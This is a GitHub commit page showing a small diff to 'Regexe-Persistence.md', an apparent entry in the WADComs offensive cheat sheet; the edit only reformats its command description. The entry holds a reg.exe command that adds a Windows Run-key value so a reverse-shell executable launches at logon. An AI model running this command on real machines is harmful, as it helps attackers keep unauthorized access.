Skip to content

Commit

Permalink
Update Regexe-Persistence.md
Browse files Browse the repository at this point in the history
  • Loading branch information
JohnWoodman authored Dec 14, 2020
1 parent 97a0916 commit 0f77576
Showing 1 changed file with 5 additions and 5 deletions.
10 changes: 5 additions & 5 deletions _wadcoms/Regexe-Persistence.md
Original file line number Diff line number Diff line change
Expand Up @@ -4,13 +4,13 @@ description: |
Command Reference:
Value Name: /v Persistence
Value Name: Persistence
RegKey data type: /t REG_SZ
Data: /d "C:\Path\To\revshell.exe"
RegKey data type: REG_SZ
KeyName: "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"
Data: "C:\Path\To\revshell.exe"
KeyName: "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"
command: |
reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v Persistence /t REG_SZ /d "C:\Path\To\revshell.exe"
Expand Down

0 comments on commit 0f77576

Please sign in to comment.